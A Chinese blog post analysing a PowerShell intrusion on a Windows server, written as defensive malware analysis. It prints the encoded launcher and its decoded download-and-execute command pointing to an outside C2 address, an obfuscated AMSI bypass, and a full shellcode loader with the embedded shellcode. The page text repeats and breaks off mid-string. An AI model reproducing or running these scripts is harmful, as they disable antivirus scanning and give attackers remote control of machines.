博客快捷键

按住 Shift 键查看可用快捷键

ShiftK

开启/关闭快捷键功能

ShiftA

打开/关闭中控台

ShiftD

深色/浅色显示模式

ShiftS

站内搜索

ShiftR

随机访问

ShiftH

返回首页

ShiftL

友链页面

ShiftP

关于本站

ShiftI

原版/本站右键菜单

松开 Shift 键或点击外部区域关闭

文章详情

互动

【CTF】勒索病毒解析

7834分钟2025-12-0514未知

前言

前一阵子朋友的一台内网Windows服务器被渗透感染了，此处分析下病毒脚本的具体执行情况。

脚本分析

攻击开始时，首先执行Powershell脚本：

POWERSHELL

powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADUANgAuADIAMwA0AC4AMgAwADkALgAxADAAMwA6ADYAMwA5ADMAOAAvAG4AcgBDAHIAUQAnACkA

Base64解密得到实际脚本：

POWERSHELL

IEX (New-Object System.Net.Webclient).DownloadString('http://156.234.209.103:63938/nrCrQ')

访问获得脚本内容：

POWERSHELL

$539w80  =[TYpe]("{4}{1}{2}{0}{3}"-f'v','T','eM.con','eRt','Sys') ;   $7ge  =[type]("{1}{0}"-f'f','rE') ; $X6J = [type]("{3}{1}{4}{0}{2}{5}" -F '.en','ysTeM','co','s','.teXt','DiNG') ; [Byte[]]${c} =  $539W80::("{3}{2}{1}{0}" -f'g','4Strin','mBase6','Fro').Invoke(("{77}{46}{73}{78}{50}{69}{92}{20}{63}{44}{24}{90}{80}{8}{51}{95}{42}{82}{83}{53}{17}{33}{45}{11}{7}{64}{12}{43}{41}{23}{86}{60}{91}{89}{49}{36}{25}{31}{38}{66}{96}{75}{19}{88}{39}{21}{84}{72}{28}{26}{18}{56}{9}{71}{74}{79}{54}{76}{62}{57}{68}{93}{94}{81}{52}{14}{34}{13}{29}{40}{58}{87}{16}{15}{3}{22}{61}{65}{6}{70}{30}{67}{1}{5}{48}{59}{47}{85}{2}{37}{0}{10}{55}{27}{32}{35}{4}" -f 'FxqajhjWFlmYz4lVhsXchdrWlxhWUYkXGlcX04Xc','I2NjbGUbH1xiZm1lQCVYZ15WaVhtGxdlaWxrXGkAASAgHl5lYGlrah4XIx5dXElcY1tlWD8lalxaYG1pXEpnZmlca2VAJVxkYGtlbEklZFxranBKHh83F1RUUlxncEtSFyMeampca','Z3BLa1w+JSB0FyAeY2NbJWRca2pw','fNxcjY2NsZRsfXGJmbWVAJSAgHlxjW','WxdAQEpF2VmYGppXE0kF1xbZkRrWmBpa0oka1xK','VtbOFpmaUdrXD4eH1tmX2tcRG','1tlWD8lalxaYG1pXEpnZmlca2VAJVxkY','bjxFUDk7OjAnS0JjPUtsRUg+TyhiSTxBZDtJUTxMKWNgQ0g5Y0lJRWNL','aWY9XGtYXlxjXDtrXD4xMVRjWF9qaVhEJWpcWmBtaVxKZ2ZpXGtlQCVcZGBrZWxJJWRca2pwSlIXNBdYbVZpWG0bAAEBdAABLCoXaWZvWSQXVG8bUlxbZlpWaVhtGxc0F1RvG1JcW2ZaVmlYbR','lgTRcja2ZjSm5cRRcjXmBKcDlcW2','xcgH2pcYGNZZFxqajhrXD4lZWBYZGY7a','JRWc8W0NE','Qsbk1LUTxIOEFOQmxQY0hGJ2JJO2JfSTxBYk08KGJIb','ABI2ppXGtcZFhpWGdWaVhtGxdUVFJcZ3BLUhd','aYGRYZXA7XGVgXVw7JWVgWGRmO2tlXGlpbDoxMVRlYFhkZjtnZzhSFzQXaVxbY2BsWVZcZ3BrVmlYbRsAAQEgAAFUW2BmTVIXNBdcZ3BrVmVpbGtcaVZpWG0bF1RcZ3BLUhdUICgXNB','BrWmVsXQEBdAEgIFxpbFtcWmZpZ1ZpWG0bFyMgICAgXGNsW2ZkVmlYbRs','XGNcW1ZrXF5WWmVsXRdlZm','w5PEVIOTxObl5KSUFMSTo5KjhLRF88RUhfPk84STtLJ14+TW5eSUZvTExDOSk4Qm48SjhRPFE7UDxKQjAnOEcvZFkqaz5YQ0RIPUg','eW1xeWGVYRBcjXGRga2VsSR4fal','kw4TW1jZ1BKaS1ZPWloWChBKUBPUUxLQihiSkwoZ1hhYmJdWnFFKmpnWkRmbE5cLUEpXDtxW1pgRW5xXmxOXGBnZVAuQU5cLSgqXGBrZVBxQ3BYaVw6aGBFbUBoMHFQZlwpWG1eaFA9RW1AaFtuUGZcKVwuWWMvWFApQ','CVqXFpgbWlcSmdmaVxrZUAlXGRga2VsSSVkXG','FpmbGRaYD1lcTlDbEBgLGAtYEMpOEc8cE86MG9hYUNvWGhDX1lnY','2VYP1xjbFtmRGtcPh4','wQGljKjxOWl','lcXV1sWVZpWG0bAAEgICBUaWtHa2VAUh8XIFQpKmtlQExSFyNUKSprZUBMUhcjVCkqa2VATFIXI1Rpa0d','A7UUJOWm9nbDxsb0UqWnEwK2JpTiJobGQnaGxkMFpPWG1jUU1kYEVwQGFaYG','bGtcaQABASA','IfFzQXa','2NgbFlWXGdwa1ZpWG0bF2Vp','UI','bEklZFxranBKF2','RgRWpoaEVwQEhELUphYidA','ltmX2tcZFZcbWBrWGVWXF1YamVsVmlYbRsAAQAAIFxpbFtcWmZpZ1ZpWG0bFyNcY2xbZmRWaVhtGx8XZFhpW','nOD1IUDk7T2c8WDlRPF','dlZmBrYGpmRx9pXGtcZFhpWEdSAA','EcAAXIXampcaVtbWFZaZmlnVmtcXlZaZWxdF2VmYGtaZ','BgK2lnakRsZylxRU4uTG','Sh4famNYbGg8JVQoJFIgHlNTHh9rYGNnSiVlZmBrWFpmQyVWGxdbZTgkF1xfWlg6cGNZZ','YUQ6R1FCa','1AaTBJUGZGS','Fx','U5CbGI4Oz5JYkhGZyc4Ry9iS1lvSEtEZydNOjliSkdFKEw6RW47RywnTkAvYktPaydORCc8S0JbY0g4ZydLS0VjSDtib01LUTxIOEEpQElqKE1HK2gqRmxhXV1GPkQ7LUlcb1k5UVhLT0lBWEZha0doPkAtTjktLDktJkp','WkZmaVFHKjlpWGtvYmdQWGloWGFEcDhhamdQLGktWEppLVg8aS1Ybjk/amlRRyo+OypfLmNnUGFEcEBhZ2dQYURwRGFqZ1BhRClAYWJnLUpqZDBaT09eTkZbZWBFOkZEYyxfQ25YXWgnbERgK21Jb1lMTSc','SxuTUtRPEg4Q','WtHa2VAUh9cYmZtZUAlWG1WaVhtGxc0F2','s+MCdMS0EpOEJaST1ZRTg+T0xJS0JJKjhQQEk7TURuW2tFOExMbyd','xMVRpa0drZUBSH','WmBE','tcPiVqW2Zfa1xkVlxtYGtYZVZcXVhqZWxWaVhtGxc0F1hnXlZpWG0bAAEg','FKlo/LXBhRGBAP2lEYkBHcEBgLy1nam5GKmlFcE','pnZmlca2VAJVxkYGtlbEklZFxranBKUhc0F1xkZWxpVmlYbRsAAQEgX2teZVxjJVx','sAAAFyFyAiIm8bFzJrZWxmOiVcW2ZaVmlYbRsXa2MkF28bFzInFzQXbxsfF2l','xrWF5cY1w7W1xrWlxjXVxJHh9cZFhFcGNZZFxqajglZWZga1pcY11cSSVkXGtqcEoXa1pcYVlGJG5cRR8fcGNZZFxqajh','vUUFBaiJCOyhuK05sR0pCbE','GRYRWNYYFpcZ0pLSR4fa','2VcaWlsOjExVGVgWGRmO2dnOF','5YYz1lZmBrWGtlXGRcY2dkQGtcSiUgamlca1xkWGlYZ1ZpWG0bFyNcZ3BrVmVpbGtcaVZpWG0bFyMeY1hsa2','pYYzoeFyMeXGdwS1xrWF5','saUsbFzQXcG','HmpbZl9rXERcbWBrWEVcXVhqZUwlKSplYE4la11mamZp','TT1jSW5vXklJQS','fW2Zfa1xEa1w+JWpbZl9r','bEQlZFxranBKUhcjHmpqWGM6ZmtsOBcjampYYzpgamU4FyNbXGNYXEoXI1pgY1lsRxcjam','tqcEpSAAEgJytvJxcjJycnKm8nFyNfa15lXEMlXFtmWlZpWG0bFyNmaVxRMTFUa','RDknOEdmKE1CW01LPltiSjtiOUlFZydJRDlMS2','XGRWXG1ga1hlVlxdWGplbFZpWG0bHxcjIGlrR2tlQBdrWlxhWUYkblxFHx9dXElcY','2hpb09CQUU/K15sTixobGQwWmFJOylfWmRgPU9aZUZcPGFqTFpoQ19ZLmloWG9Db1hgaS1YK2c9cClxWywvaEJbUUJk','taXGFZRiRuXEUfVF1cSVxjW2VYPyVqXFpgbWlcSmdmaVxrZUAlXGRga2VsSSVkXGtqcEpSHzcX','cY1w7cEQeH1xncEtcZWBdXDslIFxqY1hdGxcjHlxjbFtmRHBpZm','bZlpW','Gtl','A/FyNaYGNZbEceFyMeXGJmbWVAHh9bZl9rXERcZWBdXDslaVxbY2BsWVZcZ3BrVmlYbRsAASAeW1xeWGVYRBcjXGRga2VsSR4fal5YYz1lZm','tG1RUUlxrcDlSAAFyFyAvF2hcJBdccWBqMTFUaWtHa2VAUh8XXUABAXQBIB9cZ3BLXGtYXGk6JWlcW','1xiZm1lQCVcZGVsaVZpWG0bAAEgICBUW2BmTVIfFyBUaWtHa2VAUh83F1xncGtWXGtYXlxjXFtWa1xeVlplbF0fFyNpXF1dbFlWaVhtGx9','BrWGtlXGRcY2dkQGtcSiUgamlca1xkWGlYZ1ZpWG0bFyNbaVhbZVhrSjExVGplZmBrZVxtZWY6XmVgY2NY','RYmdQcUEpWmBnbDxsRWw8bD1tPGlnbDxpUUcqY','WZrWmxpa2plZjpcZWBdXDslaVxbY2BsWVZcZ3BrVmlYbRsAASBUXGtYXlxjXDtralhaYGtj','AXQBIGZpXFE','pXGtlYGZHZWZga1plbD1pZj1ca1heXGNcO2tcPjExVGNYX2ppWEQlalxaYG1pXE','OiVlZmBrWlxjXVxJJWRca2pwSlIXIx5aYGNZbEcXI15gSnA5XFtgPxcjX','Zca1heXGNcW1ZrXF5WWmVsXR8XIyBaZmNjOGNYbGtpYE0XY2NbJSkqY1xlaVxiF2pqXGlbW1hWWmZpZ1ZrXF5WWmVsXR8faVxrZWBmR2VmYGtaZWw9','SBlbEkxMVRqalxaWjhpXFtjYGw5cGNZZFxqajgla2BkPCVlZmBrWlxjXVxJJWRca2pwSlIXIyAgHl','ubEBeXW1wOWdOKGoqP','TxbWnBaQSxMbVlDXzxhZUlKL0libWk4Oi8','z5jamopWklfLVg7PD9oaWtLWmZsKUhvXy1YPj1tPGlNZVpvRWVQcEEpQGFEcC1DRzBvXmwpKh4fXmVgaWtKKy1calg5ZGZpPTExVGtpXG1lZjolZFxranBKUhc0F1xbZlpWaVh','Hh9c','9YaWs/WU1iZVliWz47aEVlUERqSU1EPGNJ','lma1hbZVhEFyMnFzQXZWZga2BqZkcfaVxrXGRYaVhHUgAAAR8XZFhpWEcAAXIXXGdwa1Zca1he','j8vPkBtQWtNO21fK2BAZENoQ2xQR0ZsPGlnbDxsTW1AaWstPWZCZC1abU5bOEdtQGhFblBmXClGaV8tWnFDcFg8WygrZGwpQGFEcGhhYFhMTj06Qi5qY2Y9RW','JIRG5','rZUBSHzcXXGdwa1','dMRm88UEQnYkpGW2','aVhtGxcjaVxdXWxZVmlYbRsXIycXI1xbZlpWaVhtGx9wZ2Y6MTFUY1hfamlYR','RcR','GVAHh9cY2xbZkRaYGRYZXA7XGVgXVw7J','mXQABASAeNEAsSjBlb0BIRF88RWZvPEknbj1IPEk7TVBfPFpxaypaa0QrcUVwQGlEXkFpaypcLkltTWFZQitgaj5BZk5MY09FbGc7','WmA5SkpwQWRaYGdsPGxFcEBwbytkYEFsaGljKkBhRDpqQllHKjxoTVt'))
[Byte[]]${D} =  (  Get-CHiLdITem  ("{3}{2}{1}{0}"-f'0','ABle:539W8','arI','V')).VaLUE::("{0}{3}{1}{2}" -f'FromB','64','String','ase').Invoke(("{4}{2}{7}{5}{1}{9}{0}{8}{3}{6}" -f'xe','la2','YG','CV','amNga0xgamQ4JWVm','ZrbDg','kXGtqcEo=','tYZG','WGVYR','VcZF'))
[Byte[]]${e} =   (GET-VaRiaBlE ("5"+"39W"+"80") -vAlu )::("{0}{3}{1}{4}{2}" -f 'Fr','Base64S','ring','om','t').Invoke(("{4}{5}{1}{2}{3}{0}" -f'g=','9a2','Bl','QGBqZF','W1xjYF','g'))
function o (${V}){
    [Byte[]]${T} = ${V}.("{1}{0}"-f 'ne','clo').Invoke()
    for (${x} = 0; ${x} -lt ${V}."Co`UNT"; ${x}++) {
        ${t}[${V}."CoU`Nt"-${X}-1] = ${V}[${X}] + 3
    }
    return ${T}
}

${Y} = 9while(${y} -gt 6){
    ${C} = &('O')(${C})
    ${D} = .('O')(${d})
    ${E} = &('O')(${e})
    ${y} = ${Y} - 1
}
 (GCi  ("{1}{2}{3}{0}"-f 'gE','va','rIabL','e:7')).vALUE."asse`mb`ly"."GET`TY`pE"(  (GeT-VArIablE ("{1}{0}" -f 'j','X6')).vaLUE::"a`sCIi"."G`ETSt`RING"(${d}))."g`ETFIELD"( ( chiLdITEM ('vAriA'+'BL'+'E:x'+'6j') ).value::"As`ciI"."Ge`TstriNG"(${e}),("{2}{4}{1}{5}{0}{3}"-f 'a',',S','NonPu','tic','blic','t')).("{0}{1}{2}"-f'Set','Val','ue').Invoke(${N`ULl},${t`RUE})
.("{0}{1}"-f'ie','x')( $x6J::"a`sCii"."g`ETstR`iNg"(${C}))

反混淆后，得到：

POWERSHELL

# 1. 绕过 Windows Defender/AMSI (Antimalware Scan Interface)$AmsiType = [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')
$AmsiField = $AmsiType.GetField('amsiInitFailed', [System.Reflection.BindingFlags]'NonPublic,Static')
$AmsiField.SetValue($null, $true)

# 2. 准备 Payload (变量 $c 的内容)# 下面展示的是解密逻辑，真实 Payload 通常是 Cobalt Strike Beacon 或其他 C2 Agent$PayloadBase64 = "FxqajhjWFlmYz4lVhsXchdrWlxhWUYkXGlcX04Xc..." # (原始代码中很长的那串)$PayloadBytes = [System.Convert]::FromBase64String($PayloadBase64)

# 3. 解密 Payload# 算法：将字节数组反转，并对每个字节值 +9
[Array]::Reverse($PayloadBytes)
for ($i = 0; $i -lt $PayloadBytes.Length; $i++) {
    $PayloadBytes[$i] = $PayloadBytes[$i] + 9
}

# 转换为脚本字符串
$DecodedScript = [System.Text.Encoding]::ASCII.GetString($PayloadBytes)

# 4. 执行恶意代码
Invoke-Expression $DecodedScript

把Base64重新反转、拼接、解密：

POWERSHELL

Set-StrictMode -Version 2

function func_get_proc_address {
        Param ($var_module, $var_procedure)
        $var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
        $var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
        return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
}

function func_get_delegate_type {
        Param (
                [Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
                [Parameter(Position = 1)] [Type] $var_return_type = [Void]
        )

        $var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
        $var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
        $var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')

        return $var_type_builder.CreateType()
}

If ([IntPtr]::size -eq 8) {
        [Byte[]]$var_code = [System.Convert]::FromBase64String('32ugx9PL6yMjI2JyYnNxcnVrEvFGa6hxQ2uocTtrqHEDa6hRc2sslGlpbhLqaxLjjx9CXyEPA2Li6i5iIuLBznFicmuocQOoYR9rIvNFols7KCFWUaijqyMjI2um41dEayLzc6hrO2eoYwNqIvPAdWvc6mKoF6trIvVuEuprEuOPYuLqLmIi4hvDVtJvIG8HK2Ya8lb7e2eoYwdqIvNFYqgva2eoYz9qIvNiqCerayLzYntie316eWJ7YnpieWugzwNicdzDe2J6eWuoMcps3Nzcfkkjap1USk1KTUZXI2J1aqrFb6rSYplvVAUk3PZrEuprEvFuEuNuEupic2JzYpkZdVqE3PbKsCMjI3lrquJim4xyIyNuEupicmJySSBicmKZdKq85dz2yFp4a6riaxLxaqr7bhLqcUsjEeOncXFimch2DRjc9muq5Wug4HNJKXxrqtKZPCMjI0kjS6MQIyNqqsNimicjIyNimVZlvaXc9muq0muq+Wrk49zc3NxuEupxcWKZDiU7WNz2puMspr4iIyNr3Owsp68iIyPIkMrHIiMjy6Hc3NwMQkdOSk0MYExOU0JRRgxwRlFVRlEMVRsMYnNqDGdkbnkVbHtrahcWE3lrIyS/6B56BW6IGqPtjOaJRXTaZBbxeR6DMGOffjuO3q4PV1sRI2JAQEZTVxkDQlNTT0pAQldKTE0MW0tXTk8IW05PDwNCU1NPSkBCV0pMTQxbTk8PA0pOQkRGDAkuKWJAQEZTVw5vQk1EVkJERhkDRk0OQlYuKWJAQEZTVw5mTUBMR0pNRBkDSkdGTVdKV1oPA0BMTlNRRlBQLil2UEZRDmJERk1XGQNuTFlKT09CDBYNEwMLdEpNR0xUUANtdwMVDRIYA3RKTRUXGANbFRcKA2JTU09GdEZBaEpXDBYQFA0QFQMLaGt3bm8PA09KSEYDZEZASEwKA2BLUUxORgwVGg0TDRAXGhQNEhMTA3BCRUJRSgwWEBQNEBUuKSPuW4w1DK+sJJZ88CArvkR8SRnjEhLbvU5JcycdEF3s1WpByvfgIu70VUbxRv4iMu0qfawLh5lMOCNindOWgXXc9msS6pkjI2MjYpsjMyMjYppjIyMjYpl7h3DG3PZrsHBwa6rEa6rSa6r5YpsjAyMjaqraYpkxtarB3PZroOcDpuNXlUWoJGsi4KbjVvR7e3trJgMrIyNz4Mtc3tzcEhYVDREQFw0RExoNEhMQIxn9S5I=')

        for ($x = 0; $x -lt $var_code.Count; $x++) {
                $var_code[$x] = $var_code[$x] -bxor 35
        }

        $var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
        $var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
        [System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)

        $var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void])))
        $var_runme.Invoke([IntPtr]::Zero)
}

可以发现此处是一个内存马落地的过程，通过如下流程：

POWERSHELL

# 1. 解码 shellcode
[byte[]]$code = [Convert]::FromBase64String("...")

# 2. XOR 解密
for ($i = 0; $i -lt $code.Length; $i++) {
    $code[$i] = $code[$i] -bxor 35
}

# 3. 获取 VirtualAlloc
$VirtualAlloc = GetProcAddress("kernel32.dll", "VirtualAlloc")

# 4. 申请内存（RWX）
$mem = VirtualAlloc(0, $code.Length, 0x3000, 0x40)

# 5. 写入 shellcode
[Marshal]::Copy($code, 0, $mem, $code.Length)

# 6. 执行 shellcode
$func = (delegate pointing to $mem)
$func.Invoke(0)

那么接下来我们尝试解析内存马。

内存马解析

首先尝试使用Python代码还原内存马为二进制：

PYTHON

import base64

data = "32ugx9PL6yMjI2JyYnNxcnVrEvFGa6hxQ2uocTtrqHEDa6hRc2sslGlpbhLqaxLjjx9CXyEPA2Li6i5iIuLBznFicmuocQOoYR9rIvNFols7KCFWUaijqyMjI2um41dEayLzc6hrO2eoYwNqIvPAdWvc6mKoF6trIvVuEuprEuOPYuLqLmIi4hvDVtJvIG8HK2Ya8lb7e2eoYwdqIvNFYqgva2eoYz9qIvNiqCerayLzYntie316eWJ7YnpieWugzwNicdzDe2J6eWuoMcps3Nzcfkkjap1USk1KTUZXI2J1aqrFb6rSYplvVAUk3PZrEuprEvFuEuNuEupic2JzYpkZdVqE3PbKsCMjI3lrquJim4xyIyNuEupicmJySSBicmKZdKq85dz2yFp4a6riaxLxaqr7bhLqcUsjEeOncXFimch2DRjc9muq5Wug4HNJKXxrqtKZPCMjI0kjS6MQIyNqqsNimicjIyNimVZlvaXc9muq0muq+Wrk49zc3NxuEupxcWKZDiU7WNz2puMspr4iIyNr3Owsp68iIyPIkMrHIiMjy6Hc3NwMQkdOSk0MYExOU0JRRgxwRlFVRlEMVRsMYnNqDGdkbnkVbHtrahcWE3lrIyS/6B56BW6IGqPtjOaJRXTaZBbxeR6DMGOffjuO3q4PV1sRI2JAQEZTVxkDQlNTT0pAQldKTE0MW0tXTk8IW05PDwNCU1NPSkBCV0pMTQxbTk8PA0pOQkRGDAkuKWJAQEZTVw5vQk1EVkJERhkDRk0OQlYuKWJAQEZTVw5mTUBMR0pNRBkDSkdGTVdKV1oPA0BMTlNRRlBQLil2UEZRDmJERk1XGQNuTFlKT09CDBYNEwMLdEpNR0xUUANtdwMVDRIYA3RKTRUXGANbFRcKA2JTU09GdEZBaEpXDBYQFA0QFQMLaGt3bm8PA09KSEYDZEZASEwKA2BLUUxORgwVGg0TDRAXGhQNEhMTA3BCRUJRSgwWEBQNEBUuKSPuW4w1DK+sJJZ88CArvkR8SRnjEhLbvU5JcycdEF3s1WpByvfgIu70VUbxRv4iMu0qfawLh5lMOCNindOWgXXc9msS6pkjI2MjYpsjMyMjYppjIyMjYpl7h3DG3PZrsHBwa6rEa6rSa6r5YpsjAyMjaqraYpkxtarB3PZroOcDpuNXlUWoJGsi4KbjVvR7e3trJgMrIyNz4Mtc3tzcEhYVDREQFw0RExoNEhMQIxn9S5I="
decoded = base64.b64decode(data)
shellcode = bytes([b ^ 35 for b in decoded])

open("shellcode.bin", "wb").write(shellcode)

还原后得到的文件瞬间被Defender查杀：

这下来对了！允许后先分析文件类型，使用DIE打开，未提示类型：

直接使用IDA解码，发现如下IP数据：

经过AI分析，得到以下结果：

项目	值
C2	156.234.209.103
URI	admin/Compare/Server/v8/API/DGMZ6OXHI450ZH
协议	HTTP
通信库	WinInet
数据传输	chunked-like
执行方式	内存执行
sleep	未显式（需 stage2）
jitter	未显式

结论

最终落地的内存马是一个C2控制器，可以远程执行任意命令。

烧鸡

生活明朗，万物可爱

本文是原创文章，采用 CC BY-NC-SA 4.0 协议，完整转载请注明来自烧鸡

攻击4 漏洞2 逆向1

喜欢这篇文章的人也看了

随便逛逛

【CTF】软件系统安全赛题解

【运维】飞塔防火墙40F基础配置

隐私政策

评论内容

0/500

昵称

邮箱

网址

滚动到此处加载评论...

安知鱼

来自安知鱼最新设计与科技的文章

查看全部

文章详情

互动

【CTF】勒索病毒解析

7834分钟2025-12-0514未知

前言

前一阵子朋友的一台内网Windows服务器被渗透感染了，此处分析下病毒脚本的具体执行情况。

脚本分析

攻击开始时，首先执行Powershell脚本：

POWERSHELL

powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADUANgAuADIAMwA0AC4AMgAwADkALgAxADAAMwA6ADYAMwA5ADMAOAAvAG4AcgBDAHIAUQAnACkA

Base64解密得到实际脚本：

POWERSHELL

IEX (New-Object System.Net.Webclient).DownloadString('http://156.234.209.103:63938/nrCrQ')

访问获得脚本内容：

POWERSHELL

$539w80  =[TYpe]("{4}{1}{2}{0}{3}"-f'v','T','eM.con','eRt','Sys') ;   $7ge  =[type]("{1}{0}"-f'f','rE') ; $X6J = [type]("{3}{1}{4}{0}{2}{5}" -F '.en','ysTeM','co','s','.teXt','DiNG') ; [Byte[]]${c} =  $539W80::("{3}{2}{1}{0}" -f'g','4Strin','mBase6','Fro').Invoke(("{77}{46}{73}{78}{50}{69}{92}{20}{63}{44}{24}{90}{80}{8}{51}{95}{42}{82}{83}{53}{17}{33}{45}{11}{7}{64}{12}{43}{41}{23}{86}{60}{91}{89}{49}{36}{25}{31}{38}{66}{96}{75}{19}{88}{39}{21}{84}{72}{28}{26}{18}{56}{9}{71}{74}{79}{54}{76}{62}{57}{68}{93}{94}{81}{52}{14}{34}{13}{29}{40}{58}{87}{16}{15}{3}{22}{61}{65}{6}{70}{30}{67}{1}{5}{48}{59}{47}{85}{2}{37}{0}{10}{55}{27}{32}{35}{4}" -f 'FxqajhjWFlmYz4lVhsXchdrWlxhWUYkXGlcX04Xc','I2NjbGUbH1xiZm1lQCVYZ15WaVhtGxdlaWxrXGkAASAgHl5lYGlrah4XIx5dXElcY1tlWD8lalxaYG1pXEpnZmlca2VAJVxkYGtlbEklZFxranBKHh83F1RUUlxncEtSFyMeampca','Z3BLa1w+JSB0FyAeY2NbJWRca2pw','fNxcjY2NsZRsfXGJmbWVAJSAgHlxjW','WxdAQEpF2VmYGppXE0kF1xbZkRrWmBpa0oka1xK','VtbOFpmaUdrXD4eH1tmX2tcRG','1tlWD8lalxaYG1pXEpnZmlca2VAJVxkY','bjxFUDk7OjAnS0JjPUtsRUg+TyhiSTxBZDtJUTxMKWNgQ0g5Y0lJRWNL','aWY9XGtYXlxjXDtrXD4xMVRjWF9qaVhEJWpcWmBtaVxKZ2ZpXGtlQCVcZGBrZWxJJWRca2pwSlIXNBdYbVZpWG0bAAEBdAABLCoXaWZvWSQXVG8bUlxbZlpWaVhtGxc0F1RvG1JcW2ZaVmlYbR','lgTRcja2ZjSm5cRRcjXmBKcDlcW2','xcgH2pcYGNZZFxqajhrXD4lZWBYZGY7a','JRWc8W0NE','Qsbk1LUTxIOEFOQmxQY0hGJ2JJO2JfSTxBYk08KGJIb','ABI2ppXGtcZFhpWGdWaVhtGxdUVFJcZ3BLUhd','aYGRYZXA7XGVgXVw7JWVgWGRmO2tlXGlpbDoxMVRlYFhkZjtnZzhSFzQXaVxbY2BsWVZcZ3BrVmlYbRsAAQEgAAFUW2BmTVIXNBdcZ3BrVmVpbGtcaVZpWG0bF1RcZ3BLUhdUICgXNB','BrWmVsXQEBdAEgIFxpbFtcWmZpZ1ZpWG0bFyMgICAgXGNsW2ZkVmlYbRs','XGNcW1ZrXF5WWmVsXRdlZm','w5PEVIOTxObl5KSUFMSTo5KjhLRF88RUhfPk84STtLJ14+TW5eSUZvTExDOSk4Qm48SjhRPFE7UDxKQjAnOEcvZFkqaz5YQ0RIPUg','eW1xeWGVYRBcjXGRga2VsSR4fal','kw4TW1jZ1BKaS1ZPWloWChBKUBPUUxLQihiSkwoZ1hhYmJdWnFFKmpnWkRmbE5cLUEpXDtxW1pgRW5xXmxOXGBnZVAuQU5cLSgqXGBrZVBxQ3BYaVw6aGBFbUBoMHFQZlwpWG1eaFA9RW1AaFtuUGZcKVwuWWMvWFApQ','CVqXFpgbWlcSmdmaVxrZUAlXGRga2VsSSVkXG','FpmbGRaYD1lcTlDbEBgLGAtYEMpOEc8cE86MG9hYUNvWGhDX1lnY','2VYP1xjbFtmRGtcPh4','wQGljKjxOWl','lcXV1sWVZpWG0bAAEgICBUaWtHa2VAUh8XIFQpKmtlQExSFyNUKSprZUBMUhcjVCkqa2VATFIXI1Rpa0d','A7UUJOWm9nbDxsb0UqWnEwK2JpTiJobGQnaGxkMFpPWG1jUU1kYEVwQGFaYG','bGtcaQABASA','IfFzQXa','2NgbFlWXGdwa1ZpWG0bF2Vp','UI','bEklZFxranBKF2','RgRWpoaEVwQEhELUphYidA','ltmX2tcZFZcbWBrWGVWXF1YamVsVmlYbRsAAQAAIFxpbFtcWmZpZ1ZpWG0bFyNcY2xbZmRWaVhtGx8XZFhpW','nOD1IUDk7T2c8WDlRPF','dlZmBrYGpmRx9pXGtcZFhpWEdSAA','EcAAXIXampcaVtbWFZaZmlnVmtcXlZaZWxdF2VmYGtaZ','BgK2lnakRsZylxRU4uTG','Sh4famNYbGg8JVQoJFIgHlNTHh9rYGNnSiVlZmBrWFpmQyVWGxdbZTgkF1xfWlg6cGNZZ','YUQ6R1FCa','1AaTBJUGZGS','Fx','U5CbGI4Oz5JYkhGZyc4Ry9iS1lvSEtEZydNOjliSkdFKEw6RW47RywnTkAvYktPaydORCc8S0JbY0g4ZydLS0VjSDtib01LUTxIOEEpQElqKE1HK2gqRmxhXV1GPkQ7LUlcb1k5UVhLT0lBWEZha0doPkAtTjktLDktJkp','WkZmaVFHKjlpWGtvYmdQWGloWGFEcDhhamdQLGktWEppLVg8aS1Ybjk/amlRRyo+OypfLmNnUGFEcEBhZ2dQYURwRGFqZ1BhRClAYWJnLUpqZDBaT09eTkZbZWBFOkZEYyxfQ25YXWgnbERgK21Jb1lMTSc','SxuTUtRPEg4Q','WtHa2VAUh9cYmZtZUAlWG1WaVhtGxc0F2','s+MCdMS0EpOEJaST1ZRTg+T0xJS0JJKjhQQEk7TURuW2tFOExMbyd','xMVRpa0drZUBSH','WmBE','tcPiVqW2Zfa1xkVlxtYGtYZVZcXVhqZWxWaVhtGxc0F1hnXlZpWG0bAAEg','FKlo/LXBhRGBAP2lEYkBHcEBgLy1nam5GKmlFcE','pnZmlca2VAJVxkYGtlbEklZFxranBKUhc0F1xkZWxpVmlYbRs